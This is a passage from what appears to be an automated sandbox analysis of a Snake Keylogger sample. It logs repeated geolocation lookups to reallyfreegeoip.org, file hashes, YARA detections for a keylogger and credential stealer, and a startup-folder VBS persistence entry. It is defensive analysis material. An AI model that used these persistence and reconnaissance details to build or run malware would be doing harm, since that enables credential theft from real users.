                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mx%2BynmMIq5ByGVV9gC022cuNRpL%2F9HL6%2FA50jfeCJdEGpx8mxPl6JOM3GFavMbc3ZiJtDN5BgubAUz%2BKbHxFjS%2BP0hJKXaKScexFo7CfkOMb5fC08a6F0b0%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228eee9637d08-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2035&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2808&recv_bytes=706&delivery_rate=1415414&cwnd=185&unsent_bytes=0&cid=cc00ae4c22f3265b&ts=579&x=0"
                                                                        Data Ascii: .'^=;3(3)urINTGnyk\qh/gwS2$q&=2/$e#_l@<lVusjMaIk7tzxwU#X$_(lH=}7:v\3TmCY7_n1<!}[D#F[l'[s&ikU5X


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.5 | 49752 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:33 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:34 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:34 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507083
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QiWpzTUdIz9yfP17r00TWcomdpYnxehg%2FF6pyuqHoGo7bvWNqqwSj4g%2FCsmG6mFn5miNPHDd9i3R09a10Q23FRlUh8ATog6N4Fd16QXxsCSY8FSabZDUNJ4fl%2FZrK7ZR4ZF7ATEC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228f5aea043cd-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1808049&cwnd=252&unsent_bytes=0&cid=be3347e00095bb81&ts=465&x=0"
                                                                        2024-11-25 13:59:34 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        7 | 192.168.2.5 | 49759 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:36 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:37 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:37 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507086
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bmmvjCR5OVlaf%2FxXTxe1K%2FWbyFTgVH%2F2qodtWt14NAgxAUp7huYB1ObtbjpFCiomCgApEQzrGEl1heul2hI2FA0anF0M14GKRgV4IDMP4Zy4YIkGUr6venXGsnckUYqqMvNZb0a"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82290898ca4259-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2153&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1332724&cwnd=231&unsent_bytes=0&cid=e280730f9c00f738&ts=570&x=0"
                                                                        2024-11-25 13:59:37 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        8 | 192.168.2.5 | 49767 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:39 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:40 UTC | 848 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:40 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507089
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo2c9ntrJPPXcRHNDvpLsbuE1Zw3EVysm7Bpl2TqtOumwdEL2m8TnE0cEiZTwD1KoWco2ZpQdNMwEgkbtwXq1Et1eRNa318pzhWT%2B5LrMgV8IlREkATosLZpElN0eQJeCnPynXvn"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82291ba9ce5e65-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11525&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1787025&cwnd=242&unsent_bytes=0&cid=057dc44a3dc83391&ts=465&x=0"
                                                                        2024-11-25 13:59:40 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        9 | 192.168.2.5 | 49778 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:42 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:43 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:43 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507092
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Foso6UdlwrIC%2BT4ky0CYF2ssoI%2FchI0MkRMEyFpKyRgD7vAsyd1W%2Fsg8o%2Fdc2CKT7rHxo1Gk36uZqTCLI6Pbf6gY8hRHJZgA3tX5cAuBmZkNDVhDOV0i09iscpzP1rlIme8opOmw"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82292eca450f78-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1544&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1908496&cwnd=213&unsent_bytes=0&cid=c4a64ea99b6e011e&ts=503&x=0"
                                                                        2024-11-25 13:59:43 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.5 | 49792 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:49 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:49 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:49 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507098
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eu3UtLo6kj%2BIuQoWYNNx2a%2BoIquPfex7gEr98dX58AQVUyijYlF0Gl32OA8sURH6dKrT4kulLUIx5Xo%2BK%2BaT790zllaVI97BgpNfIqqBCZc%2BPpnQw%2FAy4G%2FVwEM%2B4HL2lhMLbGon"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229575eec423d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1796&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1638608&cwnd=178&unsent_bytes=0&cid=cb92b6871ce9ed8c&ts=460&x=0"
                                                                        2024-11-25 13:59:49 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.5 | 49798 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:51 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:52 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:51 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507100
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pj7h16N%2BbHCzMqdKaccpcQZmGJ8VhOyef9Y%2FaJP%2FdpxjeqnxrCE9MHEpGTLNxHQxJ9%2B49IXVuhRr4uXQptyLo%2BsjV6P0ircbcK2KlpYkA5EYcLwFHKhy9o7vaHinteyCzYfBsIAj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229657efb41ef-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1708601&cwnd=192&unsent_bytes=0&cid=93865239cbfcdf0f&ts=566&x=0"
                                                                        2024-11-25 13:59:52 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.5 | 49808 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:54 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:55 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:54 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507103
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2BkN3h8WA66FBGLMvUbg4uio%2BRpgE8OWXDlZdlvPBmqzutKwJYxIVazB5NkzUrViynZz3xFvsxrznCpg%2FkCYGAyZFbiQLw%2BVaxJJm4o2tSr3Mp7VVE%2FllE%2B9bXi3bqlKb3idh%2BNQ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229787cff4319-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1589&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1813664&cwnd=233&unsent_bytes=0&cid=21817bd943f6a40e&ts=463&x=0"
                                                                        2024-11-25 13:59:55 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.5 | 49815 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:57 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:58 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:57 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507106
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4abmzGYQ6cDQZ3%2Fa4DwSg3uvCB0vwdI0HYJ2VsK90kH8GpTlgl8d8f9rS6qz1k3lwrBjDJ8BSJ8UNUVFAaIx1qp7Rs9xosgMYJepiIxsEabzkRXYFsxq7NeX7wk%2BFOCC%2BnfreQBr"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82298b3f8d8c42-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2028&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1427872&cwnd=252&unsent_bytes=0&cid=16ed8ca676321ff2&ts=455&x=0"
                                                                        2024-11-25 13:59:58 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.5 | 49824 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 14:00:00 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 14:00:01 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:01 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507110
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=osG9alZByCiBvKZh6XrLlgCea6UcMqOCEfMgc3pUVYKmAsO0kbiJUHhO10Bfier%2BQ0MB5%2F2bLsOOhC%2FBQnc%2FD%2F1sKglXdPo0Wbn6yKylvPdyGhfuPjq637st%2F6OPZsIRLyvpc38x"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82299e8e277cee-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2082&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1446977&cwnd=180&unsent_bytes=0&cid=5682327a9fc0450c&ts=477&x=0"
                                                                        2024-11-25 14:00:01 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.5 | 49851 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 14:00:12 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 14:00:12 UTC | 856 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:12 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507121
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqJZuMJs4JoegVqPiSHCYFD91p1WpLGFc8oBP9M5%2Bdm%2BxifZCNqMwhrgaJOBl4xM10UgqsmEQqWIeDBtPTQJ%2Fq4N7v9wwiMVznE5ICPZ%2F5s5%2BkkogLXEWMZaG6kPQRElU271Q3Gn"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229e67a928c7d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10246&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1454907&cwnd=237&unsent_bytes=0&cid=7317ca52b3925124&ts=487&x=0"
                                                                        2024-11-25 14:00:12 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.5 | 49872 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 14:00:20 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 14:00:20 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:20 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507129
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZ%2F2sFBvYQz0V2Q2XoaFIDgtrS7iNL%2BNBN%2FqyhrEkisSFuTPUcwfilq2vXuSj5mKZd%2F%2FaGLEtqE%2FKLf%2Bv5XxnWorXIQ%2FRH4Hs2JZHR9ihthIsuhCxwFfUbLwjyLvElWEwuqSTJlz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e822a186aa6433f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1765417&cwnd=215&unsent_bytes=0&cid=f45118dd4e99f1a6&ts=492&x=0"
                                                                        2024-11-25 14:00:20 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.5 | 49889 | 172.67.177.134 | 443 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 14:00:27 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 14:00:27 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:27 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507136
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2dJjXlk5TTWgA4VCWyLFRTTOdFPK9%2B0TkZSan0OsPjmPITC0UkDf%2BvGeuQvnAiaj70TSAw%2BVjh%2B%2FPqkypv9bNfamZZ8olViOzsAqIBuGieRRNl1Tpusjq9tLKMS%2FesZLJeAHiiIL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e822a44dce70f8f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1468&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1933774&cwnd=252&unsent_bytes=0&cid=68594e7d761e0814&ts=586&x=0"
                                                                        2024-11-25 14:00:27 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Target ID:0
                                                                        Start time:08:59:00
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                                                                        Imagebase:0xe00000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2244743417.00000000076A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:08:59:16
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                                                                        Imagebase:0xb50000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:4
                                                                        Start time:08:59:28
                                                                        Start date:25/11/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                                                                        Imagebase:0x7ff727c10000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
